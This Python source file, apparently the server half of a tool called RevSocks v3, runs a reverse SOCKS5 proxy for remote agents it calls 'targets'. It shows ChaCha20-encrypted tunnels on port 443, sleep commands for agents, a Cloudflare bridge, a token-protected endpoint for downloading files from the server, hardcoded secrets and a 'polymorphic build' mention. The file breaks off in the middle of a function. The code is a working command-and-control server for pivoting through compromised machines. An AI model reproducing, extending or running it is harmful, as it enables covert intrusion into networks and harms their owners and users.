#!/usr/bin/env python3
"""
RevSocks v3 — Multi-Target Reverse SOCKS5 Proxy Server

Changes from v2:
  - ChaCha20-Poly1305 tunnel encryption
  - Clean realtime CLI (no heartbeat spam)
  - creds.txt support (static SOCKS user/pass per build)
  - Sleep mode (tell agent to disconnect for N seconds)
  - KB/s realtime stats in 'ls' view
  - Polymorphic build support
  - Removed all debug/tunnel spam from console

Architecture:
  [Agent] --443--> [Server (ChaCha20)] --> :51222 (SOCKS5 auth)
"""

import socket
import threading
import struct
import os
import sys
import select
import hashlib
import json
import time
import signal
import ssl
import readline
from datetime import datetime, timedelta
from pathlib import Path
from collections import deque

# ============ CHACHA20-POLY1305 PURE PYTHON ============
# Needed for tunnel encryption (no external deps)

def _clamp(r):
    return r & 0x0ffffffc0ffffffc0ffffffc0fffffff

def _poly1305_mac(msg, key):
    r = int.from_bytes(key[:16], 'little')
    r = _clamp(r)
    s = int.from_bytes(key[16:32], 'little')
    a = 0
    p = (1 << 130) - 5
    for i in range(0, len(msg), 16):
        block = msg[i:i+16]
        n = int.from_bytes(block, 'little') + (1 << (8 * len(block)))
        a = (a + n) % p
        a = (a * r) % p
    a = (a + s) & ((1 << 128) - 1)
    return a.to_bytes(16, 'little')

def _quarter_round(state, a, b, c, d):
    state[a] = (state[a] + state[b]) & 0xFFFFFFFF; state[d] ^= state[a]; state[d] = ((state[d] << 16) | (state[d] >> 16)) & 0xFFFFFFFF
    state[c] = (state[c] + state[d]) & 0xFFFFFFFF; state[b] ^= state[c]; state[b] = ((state[b] << 12) | (state[b] >> 20)) & 0xFFFFFFFF
    state[a] = (state[a] + state[b]) & 0xFFFFFFFF; state[d] ^= state[a]; state[d] = ((state[d] << 8) | (state[d] >> 24)) & 0xFFFFFFFF
    state[c] = (state[c] + state[d]) & 0xFFFFFFFF; state[b] ^= state[c]; state[b] = ((state[b] << 7) | (state[b] >> 25)) & 0xFFFFFFFF

def _chacha20_block(key, counter, nonce):
    state = [
        0x61707865, 0x3320646e, 0x79622d32, 0x6b206574,
        int.from_bytes(key[0:4], 'little'), int.from_bytes(key[4:8], 'little'),
        int.from_bytes(key[8:12], 'little'), int.from_bytes(key[12:16], 'little'),
        int.from_bytes(key[16:20], 'little'), int.from_bytes(key[20:24], 'little'),
        int.from_bytes(key[24:28], 'little'), int.from_bytes(key[28:32], 'little'),
        counter & 0xFFFFFFFF,
        int.from_bytes(nonce[0:4], 'little'), int.from_bytes(nonce[4:8], 'little'),
        int.from_bytes(nonce[8:12], 'little'),
    ]
    working = list(state)
    for _ in range(10):
        _quarter_round(working, 0, 4, 8, 12)
        _quarter_round(working, 1, 5, 9, 13)
        _quarter_round(working, 2, 6, 10, 14)
        _quarter_round(working, 3, 7, 11, 15)
        _quarter_round(working, 0, 5, 10, 15)
        _quarter_round(working, 1, 6, 11, 12)
        _quarter_round(working, 2, 7, 8, 13)
        _quarter_round(working, 3, 4, 9, 14)
    out = b""
    for i in range(16):
        out += ((working[i] + state[i]) & 0xFFFFFFFF).to_bytes(4, 'little')
    return out

def chacha20_encrypt(key, nonce, plaintext, counter=0):
    out = bytearray()
    for i in range(0, len(plaintext), 64):
        block = _chacha20_block(key, counter + (i // 64), nonce)
        chunk = plaintext[i:i+64]
        for j in range(len(chunk)):
            out.append(chunk[j] ^ block[j])
    return bytes(out)

def chacha20_poly1305_encrypt(key, nonce, plaintext, aad=b''):
    # Generate Poly1305 key from first ChaCha20 block
    poly_key = _chacha20_block(key, 0, nonce)[:32]
    ciphertext = chacha20_encrypt(key, nonce, plaintext, counter=1)
    # Build MAC data: AAD || pad || ciphertext || pad || len(AAD) || len(ciphertext)
    mac_data = aad
    if len(aad) % 16: mac_data += b'\x00' * (16 - len(aad) % 16)
    mac_data += ciphertext
    if len(ciphertext) % 16: mac_data += b'\x00' * (16 - len(ciphertext) % 16)
    mac_data += struct.pack('<Q', len(aad)) + struct.pack('<Q', len(ciphertext))
    tag = _poly1305_mac(mac_data, poly_key)
    return ciphertext, tag

def chacha20_poly1305_decrypt(key, nonce, ciphertext, tag, aad=b''):
    poly_key = _chacha20_block(key, 0, nonce)[:32]
    mac_data = aad
    if len(aad) % 16: mac_data += b'\x00' * (16 - len(aad) % 16)
    mac_data += ciphertext
    if len(ciphertext) % 16: mac_data += b'\x00' * (16 - len(ciphertext) % 16)
    mac_data += struct.pack('<Q', len(aad)) + struct.pack('<Q', len(ciphertext))
    expected = _poly1305_mac(mac_data, poly_key)
    if tag != expected:
        return None  # Authentication failed
    return chacha20_encrypt(key, nonce, ciphertext, counter=1)


# ============ CONFIGURATION ============
TUNNEL_PORT = 443
BASE_SOCKS_PORT = 51222
SHARED_SECRET = b"f191074b103901bb58a4ca37494e4cf6"
HEALTH_CHECK_INTERVAL = 30
STATE_FILE = "targets.json"
SOCKS_USER = "user784985"
SOCKS_PASS = "5e14f16b6df99add3ff99weoif"
# =======================================

# Load creds from creds.txt if exists
CREDS_FILE = os.path.join(os.path.dirname(os.path.abspath(__file__)), "..", "creds.txt")
CREDS_FILE_ALT = os.path.join(os.path.dirname(os.path.abspath(__file__)), "creds.txt")
for cf in [CREDS_FILE, CREDS_FILE_ALT]:
    if os.path.exists(cf):
        try:
            line = open(cf).read().strip()
            if ':' in line:
                SOCKS_USER, SOCKS_PASS = line.split(':', 1)
        except:
            pass
        break

# ============ TLS CONFIGURATION ============
TLS_CERT = os.path.join(os.path.dirname(os.path.abspath(__file__)), "server.crt")
TLS_KEY = os.path.join(os.path.dirname(os.path.abspath(__file__)), "server.key")
TLS_ENABLED = os.path.exists(TLS_CERT) and os.path.exists(TLS_KEY)
if TLS_ENABLED:
    TLS_CTX = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    TLS_CTX.load_cert_chain(TLS_CERT, TLS_KEY)
    TLS_CTX.check_hostname = False
    TLS_CTX.verify_mode = ssl.CERT_NONE
else:
    TLS_CTX = None
# ===========================================

# Protocol commands
CMD_CONNECT = 0x01
CMD_DATA = 0x02
CMD_CLOSE = 0x03
CMD_CONNECT_OK = 0x04
CMD_CONNECT_FAIL = 0x05
CMD_HEARTBEAT = 0x06
CMD_SLEEP = 0x07      # NEW: sleep command
CMD_SET_SLEEP = 0x08  # NEW: set sleep interval


class CryptoChannel:
    """ChaCha20-Poly1305 encrypted channel with length framing"""
    
    def __init__(self, shared_key: bytes):
        # Derive encryption key from shared secret
        self.key = hashlib.sha256(b"chacha20_tunnel_v3_" + shared_key).digest()
        self.send_counter = 0
        self.recv_counter = 0
        self.lock = threading.Lock()
    
    def _make_nonce(self, counter):
        return struct.pack('<I', 0) + struct.pack('<Q', counter)  # 12 bytes
    
    def encrypt_and_send(self, sock, plaintext: bytes) -> bool:
        """Encrypt with ChaCha20-Poly1305 and send: [len:4][nonce:12][ciphertext][tag:16]"""
        try:
            with self.lock:
                nonce = self._make_nonce(self.send_counter)
                self.send_counter += 1
                ciphertext, tag = chacha20_poly1305_encrypt(self.key, nonce, plaintext)
                frame = nonce + ciphertext + tag
                header = struct.pack(">I", len(frame))
                sock.sendall(header + frame)
                return True
        except:
            return False
    
    def recv_and_decrypt(self, sock) -> bytes:
        """Receive and decrypt: [len:4][nonce:12][ciphertext][tag:16]"""
        raw_len = self._recvall(sock, 4)
        if not raw_len:
            return None
        frame_len = struct.unpack(">I", raw_len)[0]
        if frame_len > 1048576 or frame_len < 28:  # min: 12 nonce + 0 data + 16 tag
            return None
        frame = self._recvall(sock, frame_len)
        if not frame:
            return None
        nonce = frame[:12]
        tag = frame[-16:]
        ciphertext = frame[12:-16]
        plaintext = chacha20_poly1305_decrypt(self.key, nonce, ciphertext, tag)
        if plaintext is None:
            return None  # Auth failed
        return plaintext
    
    def _recvall(self, sock, n):
        data = b""
        while len(data) < n:
            try:
                chunk = sock.recv(n - len(data))
                if not chunk:
                    return None
                data += chunk
            except:
                return None
        return data





# ============ BANDWIDTH TRACKER ============

class BandwidthTracker:
    """Track KB/s in sliding window"""
    WINDOW = 10  # seconds
    
    def __init__(self):
        self.send_samples = deque()  # (timestamp, bytes)
        self.recv_samples = deque()
        self.lock = threading.Lock()
    
    def record_send(self, nbytes):
        now = time.time()
        with self.lock:
            self.send_samples.append((now, nbytes))
            self._prune(self.send_samples, now)
    
    def record_recv(self, nbytes):
        now = time.time()
        with self.lock:
            self.recv_samples.append((now, nbytes))
            self._prune(self.recv_samples, now)
    
    def _prune(self, samples, now):
        while samples and samples[0][0] < now - self.WINDOW:
            samples.popleft()
    
    def get_rates(self):
        """Returns (send_kbps, recv_kbps)"""
        now = time.time()
        with self.lock:
            self._prune(self.send_samples, now)
            self._prune(self.recv_samples, now)
            send_total = sum(b for _, b in self.send_samples)
            recv_total = sum(b for _, b in self.recv_samples)
        elapsed = min(self.WINDOW, max(1, now - (self.send_samples[0][0] if self.send_samples else now)))
        send_kbps = (send_total / 1024) / max(elapsed, 1)
        recv_kbps = (recv_total / 1024) / max(elapsed, 1)
        return round(send_kbps, 1), round(recv_kbps, 1)


class Target:
    """Represents a connected agent/target"""
    
    def __init__(self, target_id: int, sock: socket.socket, addr: tuple, socks_port: int):
        self.id = target_id
        self.sock = sock
        self.remote_ip = addr[0]
        self.remote_port = addr[1]
        self.socks_port = socks_port
        self.name = f"target-{target_id}"
        self.connected = True
        self.connect_time = datetime.now()
        self.last_heartbeat = datetime.now()
        self.crypto = CryptoChannel(SHARED_SECRET)
        self.streams = {}
        self.stream_counter = 0
        self.stream_lock = threading.Lock()
        self.socks_server = None
        self.bytes_sent = 0
        self.bytes_recv = 0
        self.bandwidth = BandwidthTracker()
        self.sleep_interval = 0  # 0 = no sleep
    
    def new_stream(self, local_sock) -> int:
        with self.stream_lock:
            self.stream_counter += 1
            sid = self.stream_counter
            self.streams[sid] = local_sock
            return sid
    
    def to_dict(self):
        return {
            "id": self.id,
            "name": self.name,
            "remote_ip": self.remote_ip,
            "socks_port": self.socks_port,
            "connected": self.connected,
            "connect_time": self.connect_time.isoformat(),
            "last_heartbeat": self.last_heartbeat.isoformat(),
            "bytes_sent": self.bytes_sent,
            "bytes_recv": self.bytes_recv,
        }


class TargetManager:
    """Manages all connected targets"""
    
    def __init__(self):
        self.targets = {}
        self.targets_by_sock = {}
        self.lock = threading.Lock()
        self.next_id = 1
        self.next_socks_port = BASE_SOCKS_PORT
        self.history = []
        self._load_state()
    
    def _load_state(self):
        if os.path.exists(STATE_FILE):
            try:
                with open(STATE_FILE, 'r') as f:
                    state = json.load(f)
                self.next_id = state.get("next_id", 1)
                self.next_socks_port = state.get("next_socks_port", BASE_SOCKS_PORT)
                self.history = state.get("history", [])
            except:
                pass
    
    def _save_state(self):
        state = {
            "next_id": self.next_id,
            "next_socks_port": self.next_socks_port,
            "history": self.history[-100:],
            "targets": {str(k): v.to_dict() for k, v in self.targets.items()},
        }
        try:
            with open(STATE_FILE, 'w') as f:
                json.dump(state, f, indent=2)
        except:
            pass
    
    def add_target(self, sock: socket.socket, addr: tuple) -> Target:
        with self.lock:
            existing = None
            for t in self.targets.values():
                if t.remote_ip == addr[0] and not t.connected:
                    existing = t
                    break
            
            if existing:
                existing.sock = sock
                existing.connected = True
                existing.connect_time = datetime.now()
                existing.last_heartbeat = datetime.now()
                existing.crypto = CryptoChannel(SHARED_SECRET)
                existing.streams = {}
                existing.stream_counter = 0
                existing.bandwidth = BandwidthTracker()
                self.targets_by_sock[sock] = existing
                self._save_state()
                return existing
            
            target_id = self.next_id
            socks_port = self.next_socks_port
            self.next_id += 1
            self.next_socks_port += 1
            
            target = Target(target_id, sock, addr, socks_port)
            self.targets[target_id] = target
            self.targets_by_sock[sock] = target
            self._save_state()
            return target
    
    def remove_target(self, sock: socket.socket):
        with self.lock:
            target = self.targets_by_sock.get(sock)
            if target:
                target.connected = False
                del self.targets_by_sock[sock]
                if target.socks_server:
                    try: target.socks_server.close()
                    except: pass
                    target.socks_server = None
                for sid, s in list(target.streams.items()):
                    try: s.close()
                    except: pass
                target.streams.clear()
                self._save_state()
                return target
        return None
    
    def get_target_by_id(self, target_id: int) -> Target:
        return self.targets.get(target_id)
    
    def get_target_by_name(self, name: str) -> Target:
        for t in self.targets.values():
            if t.name == name:
                return t
        return None
    
    def rename_target(self, target_id: int, new_name: str) -> bool:
        target = self.targets.get(target_id)
        if target:
            target.name = new_name
            self._save_state()
            return True
        return False
    
    def get_all_targets(self) -> list:
        return list(self.targets.values())
    
    def get_connected_targets(self) -> list:
        return [t for t in self.targets.values() if t.connected]


# ============ SOCKS5 Per-Target Server ============

class TargetSOCKS5:
    def __init__(self, target: Target):
        self.target = target
        self.server_sock = None
        self.running = False
    
    def start(self):
        self.server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.server_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        try:
            self.server_sock.bind(("0.0.0.0", self.target.socks_port))
            self.server_sock.listen(64)
            self.server_sock.settimeout(2.0)
            self.running = True
            self.target.socks_server = self.server_sock
            
            while self.running and self.target.connected:
                try:
                    client, addr = self.server_sock.accept()
                    threading.Thread(target=self._handle_socks, args=(client,), daemon=True).start()
                except socket.timeout:
                    continue
                except:
                    break
        except OSError as e:
            pass  # Port in use — silent
        finally:
            self.stop()
    
    def stop(self):
        self.running = False
        if self.server_sock:
            try: self.server_sock.close()
            except: pass
    
    def _handle_socks(self, client):
        try:
            if not self.target.connected:
                client.close()
                return
            
            data = client.recv(256)
            if not data or data[0] != 0x05:
                client.close()
                return
            
            # Check if client offers username/password auth (0x02)
            nmethods = data[1] if len(data) > 1 else 0
            methods = data[2:2+nmethods] if len(data) > 2 else b''
            
            if 0x02 in methods:
                # Username/password auth
                client.sendall(b'\x05\x02')
                auth = client.recv(512)
                if not auth or len(auth) < 5 or auth[0] != 0x01:
                    client.sendall(b'\x01\x01')
                    client.close()
                    return
                ulen = auth[1]
                username = auth[2:2+ulen].decode()
                plen = auth[2+ulen]
                password = auth[3+ulen:3+ulen+plen].decode()
                if username != SOCKS_USER or password != SOCKS_PASS:
                    client.sendall(b'\x01\x01')
                    client.close()
                    return
                client.sendall(b'\x01\x00')
            elif 0x00 in methods:
                # No auth - still require password
                client.sendall(b'\x05\xff')  # No acceptable methods
                client.close()
                return
            else:
                client.sendall(b'\x05\xff')
                client.close()
                return
            
            data = client.recv(256)
            if not data or len(data) < 7:
                client.close()
                return
            
            ver, cmd, _, atyp = data[0], data[1], data[2], data[3]
            if cmd != 0x01:
                client.sendall(b'\x05\x07\x00\x01' + b'\x00'*6)
                client.close()
                return
            
            if atyp == 0x01:
                dst_addr = socket.inet_ntoa(data[4:8])
                dst_port = struct.unpack(">H", data[8:10])[0]
            elif atyp == 0x03:
                domain_len = data[4]
                dst_addr = data[5:5+domain_len].decode()
                dst_port = struct.unpack(">H", data[5+domain_len:7+domain_len])[0]
            elif atyp == 0x04:
                dst_addr = socket.inet_ntop(socket.AF_INET6, data[4:20])
                dst_port = struct.unpack(">H", data[20:22])[0]
            else:
                client.close()
                return
            
            if not self.target.connected:
                client.sendall(b'\x05\x04\x00\x01' + b'\x00'*6)
                client.close()
                return
            
            stream_id = self.target.new_stream(client)
            addr_bytes = dst_addr.encode()
            connect_data = struct.pack(">B", len(addr_bytes)) + addr_bytes + struct.pack(">H", dst_port)
            
            if not send_to_target(self.target, CMD_CONNECT, stream_id, connect_data):
                client.sendall(b'\x05\x04\x00\x01' + b'\x00'*6)
                client.close()
                return
            
            client.sendall(b'\x05\x00\x00\x01' + b'\x00\x00\x00\x00' + b'\x00\x00')
            self._forward(client, stream_id)
        except:
            try: client.close()
            except: pass
    
    def _forward(self, client, stream_id):
        try:
            while self.target.connected:
                data = client.recv(61440)
                if not data:
                    break
                self.target.bytes_sent += len(data)
                self.target.bandwidth.record_send(len(data))
                send_to_target(self.target, CMD_DATA, stream_id, data)
        except:
            pass
        finally:
            send_to_target(self.target, CMD_CLOSE, stream_id)
            try: client.close()
            except: pass
            if stream_id in self.target.streams:
                del self.target.streams[stream_id]


def send_to_target(target: Target, cmd: int, stream_id: int, data: bytes = b'') -> bool:
    if not target.connected:
        return False
    msg = struct.pack(">BI", cmd, stream_id) + data
    try:
        return target.crypto.encrypt_and_send(target.sock, msg)
    except:
        return False


# ============ Agent Handler ============

def handle_agent(target: Target, mgr: TargetManager):
    while target.connected:
        try:
            plaintext = target.crypto.recv_and_decrypt(target.sock)
            if plaintext is None:
                break
            if len(plaintext) < 5:
                continue
            
            cmd = plaintext[0]
            stream_id = struct.unpack(">I", plaintext[1:5])[0]
            payload = plaintext[5:]
            
            if cmd == CMD_DATA:
                sock = target.streams.get(stream_id)
                if sock:
                    try:
                        sock.sendall(payload)
                        target.bytes_recv += len(payload)
                        target.bandwidth.record_recv(len(payload))
                    except:
                        send_to_target(target, CMD_CLOSE, stream_id)
                        if stream_id in target.streams:
                            del target.streams[stream_id]
            
            elif cmd == CMD_CONNECT_OK:
                pass  # Stream established
            
            elif cmd == CMD_CONNECT_FAIL:
                sock = target.streams.get(stream_id)
                if sock:
                    try: sock.close()
                    except: pass
                    del target.streams[stream_id]
            
            elif cmd == CMD_CLOSE:
                sock = target.streams.get(stream_id)
                if sock:
                    try: sock.close()
                    except: pass
                    del target.streams[stream_id]
            
            elif cmd == CMD_HEARTBEAT:
                target.last_heartbeat = datetime.now()
                # Silent — no console output
        
        except:
            break
    
    # Disconnected — one clean message
    mgr.remove_target(target.sock)
    try: target.sock.close()
    except: pass


def authenticate_agent(sock) -> bool:
    try:
        sock.settimeout(10)
        challenge = os.urandom(32)
        sock.sendall(challenge)
        expected = hashlib.sha256(SHARED_SECRET + challenge).digest()
        response = b''
        head = getattr(sock, '_revsocks_head', None)
        if head:
            response = head
            delattr(sock, '_revsocks_head')
        while len(response) < 32:
            chunk = sock.recv(32 - len(response))
            if not chunk:
                return False
            response += chunk
        sock.settimeout(None)
        return response == expected
    except:
        return False


def wait_encryption_handshake(sock) -> bool:
    """After auth, wait for v3 agent to send 'CC20' marker"""
    try:
        sock.settimeout(5)
        marker = b''
        while len(marker) < 4:
            chunk = sock.recv(4 - len(marker))
            if not chunk:
                sock.settimeout(None)
                return False
            marker += chunk
        sock.settimeout(None)
        if marker == b'CC20':
            sock.sendall(b'CC20')
            return True
        return False
    except:
        sock.settimeout(None)
        return False


# ============ Health Monitor (silent) ============

class HealthMonitor:
    def __init__(self, mgr: TargetManager):
        self.mgr = mgr
        self.running = True
    
    def start(self):
        while self.running:
            time.sleep(HEALTH_CHECK_INTERVAL)
            self._check_all()
    
    def _check_all(self):
        for t in self.mgr.get_all_targets():
            if t.connected:
                result = send_to_target(t, CMD_HEARTBEAT, 0)
                if not result:
                    t.connected = False
        self.mgr._save_state()


# ============ Fail2Ban ============




# ============ Tunnel Listener ============

class TunnelListener:
    DOWNLOAD_TOKEN = "6599207047fdf950a83e680bc24750da"
    
    def __init__(self, mgr: TargetManager):
        self.mgr = mgr
    
    def _handle_http(self, sock, addr):
        try:
            sock.settimeout(10)
            req = sock.recv(4096).decode('utf-8', errors='ignore')
            parts = req.split(' ')
            if len(parts) >= 2 and parts[0] == 'GET':
                path = parts[1]
                path_parts = path.strip('/').split('/')
                if len(path_parts) >= 3 and path_parts[0] == 'dl' and path_parts[1] == self.DOWNLOAD_TOKEN:
                    filename = path_parts[2]
                    filepath = os.path.join(os.path.dirname(os.path.abspath(__file__)), filename)
                    if os.path.exists(filepath) and '..' not in filename:
                        with open(filepath, 'rb') as f:
                            data = f.read()
                        resp = (b"HTTP/1.1 200 OK\r\nContent-Type: application/octet-stream\r\n"
                                b"Content-Length: " + str(len(data)).encode() + b"\r\nConnection: close\r\n\r\n" + data)
                        sock.sendall(resp)
                        sock.close()
                        return
            sock.sendall(b"HTTP/1.1 404 Not Found\r\nConnection: close\r\n\r\n")
        except: pass
        finally:
            try: sock.close()
            except: pass
    
    def start(self):
        srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("0.0.0.0", TUNNEL_PORT))
        srv.listen(50)
        
        while True:
            try:
                client, addr = srv.accept()
                threading.Thread(target=self._handle_new, args=(client, addr), daemon=True).start()
            except: break
    
    def _handle_new(self, sock, addr):
        ip = addr[0]
        
        try:
            sock.settimeout(3)
            try: first = sock.recv(1, socket.MSG_PEEK)
            except socket.timeout: first = None
            sock.settimeout(None)
            
            if first and first[0] == 0x16 and TLS_CTX:
                try:
                    sock = TLS_CTX.wrap_socket(sock, server_side=True)
                except ssl.SSLError:
                    sock.close()
                    return
                try:
                    sock.settimeout(3)
                    head = sock.recv(4)
                    sock.settimeout(None)
                    if head and head[:3] == b'GET':
                        rest = sock.recv(4096)
                        full_req = (head + rest).decode('utf-8', errors='ignore')
                        parts = full_req.split(' ')
                        if len(parts) >= 2:
                            path = parts[1]
                            path_parts = path.strip('/').split('/')
                            if len(path_parts) >= 3 and path_parts[0] == 'dl' and path_parts[1] == self.DOWNLOAD_TOKEN:
                                filename = path_parts[2]
                                filepath = os.path.join(os.path.dirname(os.path.abspath(__file__)), filename)
                                if os.path.exists(filepath) and '..' not in filename:
                                    with open(filepath, 'rb') as f: data = f.read()
                                    resp = (b"HTTP/1.1 200 OK\r\nContent-Type: application/octet-stream\r\n"
                                            b"Content-Length: " + str(len(data)).encode() + b"\r\nConnection: close\r\n\r\n" + data)
                                    sock.sendall(resp)
                                    sock.close()
                                    return
                        sock.sendall(b"HTTP/1.1 404 Not Found\r\nConnection: close\r\n\r\n")
                        sock.close()
                        return
                    elif head:
                        sock._revsocks_head = head
                except socket.timeout:
                    sock.settimeout(None)
                except: pass
            elif first and first[0] == 0x47:
                self._handle_http(sock, addr)
                return
        except:
            sock.close()
            return
        
        if not authenticate_agent(sock):
            sock.close()
            return
        
        
        # Require ChaCha20 handshake
        if not wait_encryption_handshake(sock):
            sock.close()
            return
        
        # TCP keepalive
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
        if hasattr(socket, 'TCP_KEEPIDLE'):
            sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPIDLE, 30)
            sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPINTVL, 10)
            sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPCNT, 5)
        
        target = self.mgr.add_target(sock, addr)
        print(f"\r\033[K\033[32m[+] NEW: [{target.id}] {target.name} from {addr[0]} -> :{target.socks_port} (ChaCha20)\033[0m")
        print(f"\033[1;36mrevsocks>\033[0m ", end="", flush=True)
        
        socks = TargetSOCKS5(target)
        threading.Thread(target=socks.start, daemon=True).start()
        handle_agent(target, self.mgr)
        
        # Clean disconnect message
        print(f"\r\033[K\033[31m[-] OFFLINE: [{target.id}] {target.name} ({target.remote_ip})\033[0m")
        print(f"\033[1;36mrevsocks>\033[0m ", end="", flush=True)




# ============ Plaintext Local Listener (for CF bridge) ============

class LocalTunnelListener:
    """Plaintext tunnel listener on localhost only - for Cloudflare bridge.
    No TLS, no CC20. Only accepts from 127.0.0.1."""
    
    LOCAL_PORT = 4444
    
    def __init__(self, mgr):
        self.mgr = mgr
    
    def start(self):
        srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("127.0.0.1", self.LOCAL_PORT))
        srv.listen(50)
        
        while True:
            try:
                client, addr = srv.accept()
                if addr[0] != "127.0.0.1":
                    client.close()
                    continue
                threading.Thread(target=self._handle, args=(client, addr), daemon=True).start()
            except:
                break
    
    def _handle(self, sock, addr):
        if not authenticate_agent(sock):
            sock.close()
            return
        
        # Read 4 bytes - agent sends CC20 or starts plaintext
        try:
            sock.settimeout(5)
            marker = b""
            while len(marker) < 4:
                chunk = sock.recv(4 - len(marker))
                if not chunk:
                    sock.close()
                    return
                marker += chunk
            sock.settimeout(None)
        except:
            sock.close()
            return
        
        if marker == b"CC20":
            sock.sendall(b"CC20")
            target = self.mgr.add_target(sock, addr)
        else:
            target = self.mgr.add_target(sock, addr)
            target.crypto = PlaintextChannel(marker)
        
        print(f"\r\033[K\033[32m[+] NEW (CF): [{target.id}] {target.name} from bridge -> :{target.socks_port}\033[0m")
        print(f"\033[1;36mrevsocks>\033[0m ", end="", flush=True)
        
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
        
        socks = TargetSOCKS5(target)
        threading.Thread(target=socks.start, daemon=True).start()
        handle_agent(target, self.mgr)
        
        print(f"\r\033[K\033[31m[-] OFFLINE (CF): [{target.id}] {target.name}\033[0m")
        print(f"\033[1;36mrevsocks>\033[0m ", end="", flush=True)


class PlaintextChannel:
    """Plaintext length-framed channel for CF bridge connections"""
    def __init__(self, initial_bytes=b""):
        self._buffer = initial_bytes
        self.lock = threading.Lock()
    
    def encrypt_and_send(self, sock, plaintext):
        try:
            with self.lock:
                header = struct.pack(">I", len(plaintext))
                sock.sendall(header + plaintext)
                return True
        except:
            return False
    
    def recv_and_decrypt(self, sock):
        raw_len = self._recvall(sock, 4)
        if not raw_len:
            return None
        msg_len = struct.unpack(">I", raw_len)[0]
        if msg_len > 1048576 or msg_len == 0:
            return None
        return self._recvall(sock, msg_len)
    
    def _recvall(self, sock, n):
        data = b""
        if self._buffer:
            take = min(len(self._buffer), n)
            data = self._buffer[:take]
            self._buffer = self._buffer[take:]
        while len(data) < n:
            try:
                chunk = sock.recv(n - len(data))
                if not chunk:
                    return None
                data += chunk
            except:
                return None
        return data


# ============ CLI Interface ============

class CLI:
    HELP = """
\033[1;36mCommands:\033[0m
  \033[1mls\033[0m / \033[1mtargets\033[0m              Live target list with KB/s stats
  \033[1mrename\033[0m <id> <name>          Rename a target
  \033[1minfo\033[0m <id|name>              Detailed target info + SOCKS5 creds
  \033[1muse\033[0m <id|name>               Quick SOCKS5 connection info
  \033[1msleep\033[0m <id|name> <seconds>   Put agent to sleep (disconnects, reconnects after)
  \033[1mhealth\033[0m                       Manual health check
  \033[1mkill\033[0m <id|name>              Force disconnect target
  \033[1mremove\033[0m <id|name>            Remove offline target from list
  \033[1mclean\033[0m                        Remove all offline targets
  \033[1mban\033[0m <ip>                     Block IP
  \033[1munban\033[0m <ip>                   Unblock IP
  \033[1mclear\033[0m                        Clear screen
  \033[1mhelp\033[0m                         This help
  \033[1mexit\033[0m                         Shutdown
"""
    
    def __init__(self, mgr: TargetManager):
        self.mgr = mgr
        self.running = True
    
    def start(self):
        import time as _time
        if sys.stdin.isatty():
            print(self.HELP)
        while self.running:
            try:
                if not sys.stdin.isatty():
                    _time.sleep(60)
                    continue
                cmd = input("\033[1;36mrevsocks>\033[0m ").strip()
                if not cmd:
                    continue
                self._dispatch(cmd)
            except EOFError:
                while self.running:
                    _time.sleep(60)
            except KeyboardInterrupt:
                print("\n[*] Use 'exit' to quit")
                continue
    
    def _dispatch(self, cmd):
        parts = cmd.split()
        action = parts[0].lower()
        args = parts[1:]
        
        handlers = {
            "targets": self._cmd_list, "list": self._cmd_list, "ls": self._cmd_list,
            "rename": lambda: self._cmd_rename(args[0], " ".join(args[1:])) if len(args) >= 2 else print("[!] Usage: rename <id> <name>"),
            "info": lambda: self._cmd_info(args[0]) if args else print("[!] Usage: info <id|name>"),
            "health": self._cmd_health,
            "kill": lambda: self._cmd_kill(args[0]) if args else print("[!] Usage: kill <id|name>"),
            "remove": lambda: self._cmd_remove(args[0]) if args else print("[!] Usage: remove <id|name>"),
            "clean": self._cmd_clean,
            "use": lambda: self._cmd_use(args[0]) if args else print("[!] Usage: use <id|name>"),
            "sleep": lambda: self._cmd_sleep(args[0], args[1]) if len(args) >= 2 else print("[!] Usage: sleep <id|name> <seconds>"),
            "clear": lambda: os.system("clear"),
            "help": lambda: print(self.HELP), "?": lambda: print(self.HELP),
            "exit": self._cmd_exit, "quit": self._cmd_exit,
        }
        
        handler = handlers.get(action)
        if handler:
            handler()
        else:
            print(f"  [!] Unknown: {cmd}")
    
    def _cmd_list(self):
        targets = self.mgr.get_all_targets()
        if not targets:
            print("  No targets.")
            return
        
        now = datetime.now()
        targets_sorted = sorted(targets, key=lambda x: (not x.connected, x.id))
        connected = sum(1 for t in targets if t.connected)
        
        # Header
        print(f"\n\033[1;37m{'─'*100}\033[0m")
        print(f"  \033[1m{'ID':<5}{'NAME':<20}{'IP':<18}{'PORT':<8}{'STATUS':<14}{'UP KB/s':<10}{'DN KB/s':<10}{'UPTIME':<12}\033[0m")
        print(f"\033[1;37m{'─'*100}\033[0m")
        
        for t in targets_sorted:
            if t.connected:
                since = (now - t.last_heartbeat).total_seconds()
                if since < HEALTH_CHECK_INTERVAL * 3:
                    status = "\033[32m● ONLINE\033[0m "
                else:
                    status = "\033[33m● STALE\033[0m  "
                uptime = str(now - t.connect_time).split('.')[0]
                send_kbps, recv_kbps = t.bandwidth.get_rates()
                up_str = f"{send_kbps:.1f}" if send_kbps > 0 else "0.0"
                down_str = f"{recv_kbps:.1f}" if recv_kbps > 0 else "0.0"
            else:
                status = "\033[31m● OFFLINE\033[0m"
                uptime = "—"
                up_str = "—"
                down_str = "—"
            
            print(f"  {t.id:<5}{t.name:<20}{t.remote_ip:<18}{t.socks_port:<8}{status}  {up_str:<10}{down_str:<10}{uptime}")
        
        print(f"\033[1;37m{'─'*100}\033[0m")
        print(f"  \033[1mTotal:\033[0m {len(targets)} | \033[32mOnline:\033[0m {connected} | \033[31mOffline:\033[0m {len(targets)-connected} | \033[1mAuth:\033[0m {SOCKS_USER}:{SOCKS_PASS}")
        print()
    
    def _human_bytes(self, b):
        if b < 1024: return f"{b}B"
        if b < 1024*1024: return f"{b/1024:.1f}KB"
        if b < 1024*1024*1024: return f"{b/(1024*1024):.1f}MB"
